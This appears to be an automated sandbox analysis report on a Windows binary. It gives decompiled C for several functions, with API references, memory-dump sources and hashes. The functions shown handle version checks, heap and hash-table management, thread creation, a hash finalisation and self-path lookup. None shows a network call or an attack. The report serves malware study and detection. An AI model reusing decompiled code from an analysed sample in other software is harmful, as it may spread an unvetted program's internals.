0x00000000
0x004058a3
0x004058a3
0x004058a6
0x004058b9
0x004058a8
0x004058ab
0x004058ad
0x004058ad
0x00000000
0x004058ad
0x004058ab
0x00000000
0x004058a6
0x0040583c
0x0040583c
0x0040583e
0x0040583e
0x00405841
0x00405841
0x00405844
0x00405847
0x0040584e
0x00405850
0x00405850
0x00405853
0x00405858
0x0040585d
0x00000000
0x00000000
0x0040586d
0x00405872
0x00405886
0x0040588e
0x00405874
0x00405877
0x004058bd
0x00405879
0x00405879
0x0040587d
0x00405880
0x00000000
0x00405880
0x00405877
0x00000000
0x00405872
0x00405864
0x00405868
0x00000000
0x00405868
0x004058c1
0x004058c2
0x004058c7
0x004058cb
0x004058cf
0x004058e1
0x004058e6
0x004058e6
0x004058f0
0x004058f4
0x004058f9
0x004058fe
0x00405904
0x0040590c
0x0040590c

APIs

wcsncmp.MSVCRT(00000000,?,?,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00416020,00000001,00000000), ref: 00405853
memmove.MSVCRT ref: 004058E1
wcsncpy.MSVCRT ref: 004058F9

Strings

$ A, xrefs: 00405819
$ A, xrefs: 0040580C

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: memmovewcsncmpwcsncpy
String ID: $ A$$ A
API String ID: 1452150355-1089091023
Opcode ID: 01dc566c673ae38027766f4b1f49813a2af966d144f1d70881dd4b0cdd00eead
Instruction ID: ed4ff4c18a2212810426b4098d69787d901a9ef51c17c0146ffb5f4eacdccb4b
Opcode Fuzzy Hash: 01dc566c673ae38027766f4b1f49813a2af966d144f1d70881dd4b0cdd00eead
Instruction Fuzzy Hash: 9F310636904B058BC720BB45888057B73A8EF84344F14893FEC85773C2EB789D61CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405553, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00405553(void* _a4) {
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t5;
				signed int _t6;
				void* _t10;

				_t10 = _a4;
				memset(_t10, 0, 0x11c);
				 *_t10 = 0x11c;
				_t3 = GetModuleHandleW(L"ntdll.dll");
				if(_t3 == 0) {
					L3:
					return 0;
				}
				_t5 = GetProcAddress(_t3, "RtlGetVersion");
				if(_t5 == 0) {
					goto L3;
				}
				_t6 =  *_t5(_t10);
				asm("sbb eax, eax");
				return  ~_t6 + 1;
			}

0x00405554
0x00405562
0x0040556a
0x00405571
0x00405579
0x00405595
0x00000000
0x00405595
0x00405581
0x00405589
0x00000000
0x00000000
0x0040558c
0x00405590
0x00000000

APIs

memset.MSVCRT ref: 00405562
GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 00405571
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00405581

Strings

RtlGetVersion, xrefs: 0040557B
ntdll.dll, xrefs: 0040556C

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcmemset
String ID: RtlGetVersion$ntdll.dll
API String ID: 3137504439-1489217083
Opcode ID: 2ebf752f119f1388f39407ae3350cfacb0de20c2e2bdd879fe172bcb8d336fbf
Instruction ID: d7b210edb93dcdeb2ccead98f224fd87bedff0db37ff7f51e22340fec2856e60
Opcode Fuzzy Hash: 2ebf752f119f1388f39407ae3350cfacb0de20c2e2bdd879fe172bcb8d336fbf
Instruction Fuzzy Hash: E0E0DF317606127AD6202B32AC09FCB2F9DDFCAB00B15043AB109F21C4E67CC5018ABD

Uniqueness

Uniqueness Score: -1.00%

Function 00409FE3, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 80
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00409FE3(void** _a4, wchar_t* _a8, intOrPtr _a12) {
				signed int _t35;
				wchar_t* _t41;
				wchar_t* _t50;
				void* _t57;
				void** _t58;
				signed int _t59;

				_t50 = _a8;
				_t58 = _a4;
				if(_a12 != 1) {
					L4:
					if(_t50 == 0) {
						_t50 = 0x412024;
					}
					_push(_t50);
					if((_t58[0xb] & 0x00000001) == 0) {
						_t35 = E0040A24F();
					} else {
						_t35 = E0040A26A();
					}
					_t59 = _t35 % _t58[9];
					_t57 = E0040D51F(_t58[0xe]);
					if(_t57 == 0) {
						L14:
						return _t57;
					} else {
						_t41 = HeapAlloc( *0x417008, 0, 2 + wcslen(_t50) * 2);
						 *(_t57 + 4) = _t41;
						wcscpy(_t41, _t50);
						 *_t57 =  *(_t58[1] + _t59 * 4);
						 *(_t58[1] + _t59 * 4) = _t57;
						_t58[2] = _t58[2] & 0x00000000;
						_t58[0xa] = _t58[0xa] + 1;
						 *_t58 = _t57;
						_t57 = _t57 + 8;
						_t58[5] = _t59;
						L11:
						if(_t57 != 0) {
							memset(_t57, 0, _t58[7]);
							if((_t58[0xb] & 0x00000002) != 0) {
								E00411B6F(_t57, _t58[4]);
							}
						}
						goto L14;
					}
				}
				_t57 = E00409F58(_t58, _t50);
				if(_t57 == 0) {
					goto L4;
				}
				if(_t58[4] != 0) {
					E00411A6A(_t48, _t57, _t58[4]);
				}
				goto L11;
			}

0x00409fe9
0x00409fef
0x00409ff4
0x0040a018
0x0040a01a
0x0040a01c
0x0040a01c
0x0040a025
0x0040a026
0x0040a02f
0x0040a028
0x0040a028
0x0040a028
0x0040a03d
0x0040a044
0x0040a048
0x0040a0b1
0x0040a0b7
0x0040a04a
0x0040a061
0x0040a069
0x0040a06c
0x0040a079
0x0040a07e
0x0040a081
0x0040a085
0x0040a088
0x0040a08a
0x0040a08d
0x0040a090
0x0040a092
0x0040a09a
0x0040a0a6
0x0040a0ac
0x0040a0ac
0x0040a0a6
0x00000000
0x0040a092
0x0040a048
0x00409ffd
0x0040a001
0x00000000
0x00000000
0x0040a007
0x0040a011
0x0040a011
0x00000000

APIs

wcslen.MSVCRT ref: 0040A04B
HeapAlloc.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00000000,00409E6C,?,?,00000000,?,?,00403C62), ref: 0040A061
wcscpy.MSVCRT ref: 0040A06C
memset.MSVCRT ref: 0040A09A

Strings

$ A, xrefs: 0040A01C

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeapmemsetwcscpywcslen
String ID: $ A
API String ID: 1807340688-1415209610
Opcode ID: b573f2360bade24b46352e79e7494a938b3e836be09a0675c3f18950fe9764d4
Instruction ID: 6837a03683538e1df5e2bdda5e350eaa22186be17e149c7482ea07580a24f61f
Opcode Fuzzy Hash: b573f2360bade24b46352e79e7494a938b3e836be09a0675c3f18950fe9764d4
Instruction Fuzzy Hash: 2F21F732400B04AFC331AF259881B67B7F5EF88318F14453FFA4562692D739A8148B1E

Uniqueness

Uniqueness Score: -1.00%

Function 00409D80, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 73
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409D80(intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				void* _v0;
				void* _t25;
				void* _t31;
				void* _t34;
				signed int _t36;
				intOrPtr _t38;
				long _t39;
				intOrPtr _t41;
				void* _t42;

				_t41 = _a16;
				E00409E6F(_v0);
				_t34 = HeapAlloc( *0x417008, 0, 0x3c);
				if(_t34 != 0) {
					_t36 =  *(_t42 + 0x24);
					if(_t36 <= 0) {
						_t36 = 1;
					}
					_t25 = HeapAlloc( *0x417008, 8, _t36 << 2);
					 *(_t34 + 4) = _t25;
					if(_t25 == 0) {
						HeapFree( *0x417008, 0, _t34);
						_t34 = 0;
					} else {
						 *((intOrPtr*)(_t34 + 0x20)) = _a8;
						 *(_t34 + 0x24) = _t36;
						_t38 = _a4;
						 *_t34 = 0;
						 *((intOrPtr*)(_t34 + 0x1c)) = _t38;
						 *((intOrPtr*)(_t34 + 0x10)) =  *((intOrPtr*)(_t42 + 0x1c));
						 *((intOrPtr*)(_t34 + 0x28)) = 0;
						 *(_t34 + 0x2c) = 0;
						 *((intOrPtr*)(_t34 + 0x30)) = _t41;
						 *((intOrPtr*)(_t34 + 0x34)) = 0;
						if(E00411744( *((intOrPtr*)(_t42 + 0x1c))) != 0) {
							 *(_t34 + 0x2c) =  *(_t34 + 0x2c) | 0x00000002;
						}
						_t39 = _t38 + 8;
						 *((intOrPtr*)(_t34 + 0x38)) = E0040D7B9(_t39, 0x10, 0x10000, 4);
						_t31 = HeapAlloc( *0x417008, 8, _t39);
						 *(_t34 + 0xc) = _t31;
						 *((intOrPtr*)(_t31 + 4)) = 0x412024;
						_v0 = _t34;
					}
				}
				return _t34;
			}

0x00409d82
0x00409d8a
0x00409da1
0x00409da5
0x00409dac
0x00409db2
0x00409db6
0x00409db6
0x00409dc5
0x00409dc7
0x00409dcc
0x00409e3c
0x00409e42
0x00409dce
0x00409dd4
0x00409ddb
0x00409dde
0x00409de3
0x00409de5
0x00409de8
0x00409deb
0x00409dee
0x00409df1
0x00409df4
0x00409dfe
0x00409e00
0x00409e00
0x00409e0d
0x00409e19
0x00409e22
0x00409e24
0x00409e27
0x00409e2e
0x00409e2e
0x00409e44
0x00409e4a

APIs

Part of subcall function 00409E6F: HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409E9A
Part of subcall function 00409E6F: HeapFree.KERNEL32(00000000,?,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409EA6
Part of subcall function 00409E6F: HeapFree.KERNEL32(00000000,?,?,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409EBA
Part of subcall function 00409E6F: HeapFree.KERNEL32(00000000,00000000,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409ED0

HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409D9F
HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DC5
HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E22
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E3C

Strings

$ A, xrefs: 00409E27

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$Alloc
String ID: $ A
API String ID: 3901518246-1415209610
Opcode ID: ccb60d0c3c0d97d686ede39e266302f74ea26cab0db78b650e52f4041141fcd5
Instruction ID: 0e5c90150bc367b96ffc2f2020c4fe6cd7e8dd6a87ef93d6b65d9b762928b75a
Opcode Fuzzy Hash: ccb60d0c3c0d97d686ede39e266302f74ea26cab0db78b650e52f4041141fcd5
Instruction Fuzzy Hash: 66216D71644711ABD3118F2ADD01B46BBE8FF48750F40812AB608E7691D770EC65CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00405492, Relevance: 7.6, APIs: 5, Instructions: 60
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405492(void* __ebx, _Unknown_base(*)()* _a4, void* _a8) {
				long _v4;
				long _t9;
				intOrPtr* _t11;
				void** _t16;
				intOrPtr* _t23;
				long _t25;
				void* _t26;

				_t25 = 0;
				_t26 = CreateThread(0, 0x1000, _a4, _a8, 0,  &_v4);
				if(_t26 != 0) {
					EnterCriticalSection(0x4176a0);
					_t23 =  *0x4170bc; // 0x0
					if(_t23 != 0) {
						do {
							_t4 = _t23 + 8; // 0x8
							_t16 = _t4;
							if(WaitForSingleObject( *_t16, _t25) != 0) {
								_t23 =  *_t23;
							} else {
								CloseHandle( *_t16);
								_t23 =  *_t23;
								E0040DAD2(0x4170bc, _t16);
							}
						} while (_t23 != 0);
					}
					_t9 =  *0x416110; // 0x1
					_t25 = _t9;
					 *0x416110 = _t9 + 1;
					_t11 = E0040DB12(0x4170bc, 0x10);
					 *_t11 = _t26;
					 *(_t11 + 4) = _t25;
					LeaveCriticalSection(0x4176a0);
				}
				return _t25;
			}

0x00405499
0x004054b1
0x004054b5
0x004054bd
0x004054c3
0x004054cb
0x004054ce
0x004054cf
0x004054cf
0x004054dc
0x004054f7
0x004054de
0x004054e0
0x004054e6
0x004054ee
0x004054f4
0x004054f9
0x004054fd
0x004054fe
0x00405503
0x0040550d
0x00405512
0x0040551e
0x00405520
0x00405523
0x00405529
0x0040552f

APIs

CreateThread.KERNEL32 ref: 004054AB
EnterCriticalSection.KERNEL32(004176A0,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0

Part of subcall function 0040DAD2: HeapFree.KERNEL32(00000000,-00000008,0040D3EB,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB0B

LeaveCriticalSection.KERNEL32(004176A0,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
String ID:
API String ID: 3708593966-0
Opcode ID: 2d0ef3e9194763f319c037b8616fe7bccb25afd52532eb252bbef820a5610205
Instruction ID: c80a9bd37122c97109a10f206962e584b77ac8964ddc4e7c45fa9607085a50ae
Opcode Fuzzy Hash: 2d0ef3e9194763f319c037b8616fe7bccb25afd52532eb252bbef820a5610205
Instruction Fuzzy Hash: 1111A336204710BFC2115F59EC05E97BB69EB45762722802AF80197294EB75E9508F6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D8E6, Relevance: 7.6, APIs: 5, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D8E6(void* __ebp, void* _a4) {
				int _t19;
				void _t24;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;

				_t27 = _a4;
				_t26 =  *(_t27 + 8);
				if(_t26 == 0) {
					E0040D67D(_t27);
					if( *((intOrPtr*)(_t27 + 0x1c)) != 0) {
						_t14 = _t27 + 0x20; // 0x20
						DeleteCriticalSection(_t14);
					}
					return HeapFree( *0x417008, 0, _t27);
				}
				EnterCriticalSection(0x41761c);
				 *((intOrPtr*)( *(_t27 + 8) + 0x14)) =  *((intOrPtr*)( *(_t27 + 8) + 0x14)) - 1;
				_t19 =  *(_t27 + 8);
				if( *((intOrPtr*)(_t19 + 0x14)) <= 0) {
					 *(_t27 + 8) =  *(_t27 + 8) & 0x00000000;
					E0040D8E6(0x41761c, _t27);
					_t24 =  *_t26;
					if(_t24 != 0) {
						 *(_t24 + 4) =  *(_t26 + 4);
					}
					_t25 =  *(_t26 + 4);
					if(_t25 != 0) {
						 *_t25 =  *_t26;
					}
					_t35 =  *0x417618 - _t26; // 0x2590fa8
					if(_t35 == 0) {
						 *0x417618 =  *_t26;
					}
					_t19 = HeapFree( *0x417008, 0, _t26);
				}
				LeaveCriticalSection(0x41761c);
				return _t19;
			}

0x0040d8e7
0x0040d8ec
0x0040d8f1
0x0040d959
0x0040d962
0x0040d964
0x0040d968
0x0040d968
0x00000000
0x0040d977
0x0040d8fa
0x0040d903
0x0040d906
0x0040d90d
0x0040d90f
0x0040d914
0x0040d919
0x0040d91d
0x0040d922
0x0040d922
0x0040d925
0x0040d92a
0x0040d92e
0x0040d92e
0x0040d930
0x0040d936
0x0040d93a
0x0040d93a
0x0040d948
0x0040d948
0x0040d94f
0x00000000

APIs

EnterCriticalSection.KERNEL32(0041761C,00000200,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3), ref: 0040D8FA
LeaveCriticalSection.KERNEL32(0041761C,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D94F

Part of subcall function 0040D8E6: HeapFree.KERNEL32(00000000,?,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004), ref: 0040D948

DeleteCriticalSection.KERNEL32(00000020,00000000,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3), ref: 0040D968
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200), ref: 0040D977

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$FreeHeap$DeleteEnterLeave
String ID:
API String ID: 3171405041-0
Opcode ID: 36284dfdec02e05f935528c2070bfad03c6b4f7cfd04ca417c4f9c2788c2e318
Instruction ID: 7b35f574515ae906377effd3f95b136c975bcdd302f3c0dc89a566dd6d791b35
Opcode Fuzzy Hash: 36284dfdec02e05f935528c2070bfad03c6b4f7cfd04ca417c4f9c2788c2e318
Instruction Fuzzy Hash: BB1158B5502601EFC320AF59EC08F97BBB5FF44311F11843AA44AA36A1C734E849CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00409638, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00409638(void* __eflags, intOrPtr _a4) {
				int _t9;
				void* _t18;
				signed int _t19;

				_t18 = E0040E200(0x104, _a4);
				_t19 = GetModuleFileNameW( *0x41700c, _t18, 0x104);
				_t9 = wcscmp(_t18, L"\\\\?\\");
				_pop(_t17);
				if(_t9 == 0) {
					_t17 = _t19 * 2 - 8;
					_t4 = _t18 + 8; // 0x8
					memmove(_t18, _t4, _t19 * 2 - 8);
					_t19 = _t19 - 4;
				}
				E0040E350(_t17, 0x104 - _t19);
				 *((short*)(_t18 + _t19 * 2)) = 0;
				return 0;
			}

0x0040964b
0x00409660
0x00409662
0x00409668
0x0040966b
0x0040966d
0x00409675
0x0040967a
0x00409682
0x00409682
0x00409688
0x0040968f
0x00409696

APIs

Part of subcall function 0040E200: TlsGetValue.KERNEL32(0000001B,00001000,00000000,00000000), ref: 0040E20C
Part of subcall function 0040E200: RtlReAllocateHeap.NTDLL(02790000,00000000,?,?), ref: 0040E267

GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 00409654
wcscmp.MSVCRT ref: 00409662
memmove.MSVCRT ref: 0040967A

Strings

\\?\, xrefs: 0040965A, 00409674

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateFileHeapModuleNameValuememmovewcscmp
String ID: \\?\
API String ID: 2309408642-4282027825
Opcode ID: fbad7318e541a16fa2a5137efdadcaf2b9572ff9adb65b6fab0241818ba7fff1
Instruction ID: d9f8f264266041fd0450fbf5fddac35174bfa4872681c7093a6bedb058d4d6d6
Opcode Fuzzy Hash: fbad7318e541a16fa2a5137efdadcaf2b9572ff9adb65b6fab0241818ba7fff1
Instruction Fuzzy Hash: 36F082B31007017BD2106777EC89CAB7F6CEB953B47500A3FF915D25D1EA39982486B8

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1D6, Relevance: 6.3, APIs: 5, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040B1D6(intOrPtr _a4, void* _a8) {
				void _v8;
				intOrPtr _t42;
				void* _t43;
				void* _t46;
				signed int _t49;
				signed int _t50;
				void* _t51;
				void* _t52;
				void* _t54;

				_t52 = _a8;
				_t49 = 0;
				do {
					_t43 = 3;
					asm("sbb eax, eax");
					 *((char*)(_t54 + _t49 + 0x10)) =  *(_t52 + 0x14 +  ~(_t49 & 0x00000003) * 4) >> _t43 - (_t49 & 0x00000003) << 3;
					_t49 = _t49 + 1;
				} while (_t49 < 8);
				_push(1);
				_push(0x4126e8);
				_push(_t52);
				E0040C5D6();
				_t51 = _t52 + 0x14;
				while(1) {
					_t54 = _t54 + 0xc;
					if(( *_t51 & 0x000001f8) == 0x1c0) {
						break;
					}
					_push(1);
					_push(0x4126ec);
					_push(_t52);
					E0040C5D6();
				}
				_push(8);
				_push( &_v8);
				_push(_t52);
				E0040C5D6();
				_t42 = _a4;
				_t50 = 0;
				do {
					_t46 = 3;
					 *((char*)(_t50 + _t42)) =  *(_t52 + (_t50 >> 2) * 4) >> _t46 - (_t50 & 0x00000003) << 3;
					_t50 = _t50 + 1;
				} while (_t50 < 0x14);
				memset(_t52 + 0x1c, 0, 0x40);
				memset(_t52, 0, 0x14);
				memset(_t51, 0, 8);
				memset( &_v8, 0, 8);
				return memset(_t52 + 0x60, 0, 0x40);
			}

0x0040b1db
0x0040b1e2
0x0040b1e4
0x0040b1eb
0x0040b1f4
0x0040b1fe
0x0040b202
0x0040b203
0x0040b208
0x0040b20a
0x0040b20f
0x0040b210
0x0040b215
0x0040b22c
0x0040b22e
0x0040b238
0x00000000
0x00000000
0x0040b21f
0x0040b221
0x0040b226
0x0040b227
0x0040b227
0x0040b23a
0x0040b240
0x0040b241
0x0040b242
0x0040b247
0x0040b24e
0x0040b250
0x0040b257
0x0040b267
0x0040b26a
0x0040b26b
0x0040b277
0x0040b280
0x0040b289
0x0040b296
0x0040b2b0

APIs

memset.MSVCRT ref: 0040B277
memset.MSVCRT ref: 0040B280
memset.MSVCRT ref: 0040B289
memset.MSVCRT ref: 0040B296
memset.MSVCRT ref: 0040B2A2

Part of subcall function 0040C5D6: memcpy.MSVCRT ref: 0040C630
Part of subcall function 0040C5D6: memcpy.MSVCRT ref: 0040C67F

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 7b29d3bf7a70286dc5075c0c827aae832c977d302947bffe320cb461f71f8c18
Instruction ID: d1c0989406727a65e9950a574f083ae989d166c781cac5fdd553c274dd2af307
Opcode Fuzzy Hash: 7b29d3bf7a70286dc5075c0c827aae832c977d302947bffe320cb461f71f8c18
Instruction Fuzzy Hash: D821F1317507082BE124AA29DC86F9F738CDB81708F40063EF201FA1C1CAB9F54546AE

Uniqueness

Uniqueness Score: -1.00%

Function 00405B40, Relevance: 6.2, APIs: 4, Instructions: 167
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405B40() {
				void* _t52;
				signed int _t62;
				void _t63;
				void* _t65;
				signed int _t67;
				void* _t68;
				signed int _t76;
				void* _t78;
				long _t81;
				signed int _t82;
				wchar_t* _t84;
				signed int _t86;
				void* _t88;
				void* _t90;
				void* _t92;
				wchar_t* _t93;
				void* _t95;
				int _t97;
				wchar_t* _t98;
				void* _t100;

				_t93 =  *(_t100 + 0x20);
				if(_t93 == 0) {
					_t82 = 0;
					L5:
					_t52 = E0040E180(_t86, _t93);
					_t95 =  *(_t100 + 0x24);
					 *(_t100 + 0x24) = _t52;
					 *(_t100 + 0x28) = E0040E180(_t86, _t95);
					_t98 = E0040E200(_t82,  *((intOrPtr*)(_t100 + 0x34)));
					_t55 =  *(_t100 + 0x20);
					if( *(_t100 + 0x20) != 0) {
						_t93 = E0040E2D0(_t86, _t55);
					}
					_t56 =  *(_t100 + 0x24);
					if( *(_t100 + 0x24) != 0) {
						_t95 = E0040E2D0(_t86, _t56);
					}
					 *(_t100 + 0x18) = _t98;
					if(_t93 == 0 ||  *_t93 == 0) {
						L38:
						E0040E350(_t86, _t82 - (_t98 -  *(_t100 + 0x18) >> 1));
						 *_t98 = 0;
						return 0;
					} else {
						if(_t95 == 0 ||  *_t95 == 0) {
							_t86 = _t98 - _t93;
							do {
								_t62 =  *_t93 & 0x0000ffff;
								_t93 =  &(_t93[0]);
								 *(_t86 + _t93 - 2) = _t62;
							} while (_t62 != 0);
							_t98 = _t98 + _t82 * 2;
							goto L38;
						} else {
							_t88 = _t95;
							 *(_t100 + 0x14) = _t93;
							_t11 = _t88 + 2; // 0x2
							_t90 = _t11;
							do {
								_t63 =  *_t88;
								_t88 = _t88 + 2;
							} while (_t63 != 0);
							_t86 = _t88 - _t90 >> 1;
							 *(_t100 + 0x20) = _t86;
							if( *(_t100 + 0x24) == 0) {
								 *(_t100 + 0x10) =  *(_t100 + 0x2c);
								L20:
								 *((intOrPtr*)(_t100 + 0x34)) = 0x40530d;
								if(( *(_t100 + 0x28) & 0x00000001) == 0) {
									 *((intOrPtr*)(_t100 + 0x34)) = L004052F5;
								}
								_t65 =  *(_t100 + 0x2c);
								if(_t65 > 1) {
									wcsncpy(_t98, _t93, _t65 - 1);
									_t76 =  *(_t100 + 0x38);
									_t100 = _t100 + 0xc;
									_t98 = _t98 + _t76 * 2 + 0xfffffffe;
									_t93 = _t93 + _t76 * 2 + 0xfffffffe;
								}
								if( *_t93 == 0) {
									L30:
									if( *(_t100 + 0x24) != 0) {
										HeapFree( *0x417008, 0,  *(_t100 + 0x10));
									}
									goto L38;
								} else {
									_t67 =  *(_t100 + 0x20);
									do {
										_t68 =  *((intOrPtr*)(_t100 + 0x40))(_t93, _t95, _t67);
										_t100 = _t100 + 0xc;
										if(_t68 != 0) {
											 *_t98 =  *_t93;
											_t98 =  &(_t98[0]);
											_t67 =  *(_t100 + 0x20);
											_t93 =  &(_t93[0]);
											goto L33;
										}
										_t67 =  *(_t100 + 0x20);
										_t86 =  *(_t100 + 0x30);
										_t93 = _t93 + _t67 * 2;
										if(_t86 == 0xffffffff) {
											goto L33;
										}
										_t86 = _t86 - 1;
										 *(_t100 + 0x30) = _t86;
										if(_t86 > 0) {
											goto L33;
										}
										_t97 = _t82 - (_t93 -  *(_t100 + 0x14) >> 1);
										wcsncpy(_t98, _t93, _t97);
										_t100 = _t100 + 0xc;
										_t98 = _t98 + _t97 * 2;
										goto L30;
										L33:
									} while ( *_t93 != 0);
									goto L30;
								}
							}
							_t78 = HeapAlloc( *0x417008, 0, 2 + _t86 * 2);
							 *(_t100 + 0x10) = _t78;
							_t92 = _t78 - _t95;
							do {
								_t86 =  *_t95 & 0x0000ffff;
								_t95 = _t95 + 2;
								 *(_t92 + _t95 - 2) = _t86;
							} while (_t86 != 0);
							_t95 = _t78;
							goto L20;
						}
					}
				}
				_t84 = _t93;
				_t86 =  &(_t84[0]);
				do {
					_t81 =  *_t84;
